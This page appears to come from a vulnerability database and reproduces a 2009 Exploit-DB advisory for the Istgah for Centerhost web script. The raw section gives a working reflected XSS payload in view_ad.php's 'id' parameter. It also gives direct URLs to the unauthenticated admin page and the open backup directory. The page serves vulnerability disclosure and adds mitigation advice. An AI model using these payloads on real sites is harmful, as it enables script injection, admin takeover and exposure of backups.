header-logo
Suggest Exploit
vendor:
Istgah
by:
indoushka
7,5
CVSS
HIGH
XSS, Bypass, Backup
79, 287, 522
CWE
Product Name: Istgah
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2009

Istgah for Centerhost Mullti Vulnerability

The vulnerability allows an attacker to inject malicious JavaScript code into the application via the 'id' parameter in the 'view_ad.php' script. An attacker can also bypass authentication by accessing the 'cpindex.html' page. Additionally, an attacker can access the 'backup' directory without authentication.

Mitigation:

Input validation should be used to prevent the injection of malicious code. Authentication should be enforced for all sensitive pages.
Source

Exploit-DB raw data:

 ========================================================================================                  
| # Title    : Istgah for Centerhost Mullti Vulnerability      
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iqs3cur1ty.com                                                                              
| # Web Site : http://dl.p30vel.ir/scripts/Istgah_for_Centerhost_p30vel.ir.zip                                                                                                                                   
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Mullti                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1 -XSS:
 
 http://127.0.0.1/Istgah/view_ad.php?id=/"'><ScRiPt>alert(213771818860)</ScRiPt>
 
 2 - By PAss :
 
 http://127.0.0.1/Istgah/admincp/cpindex.html
 
 3 - Backup:
 
 http://127.0.0.1/Istgah/admincp/backup/

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------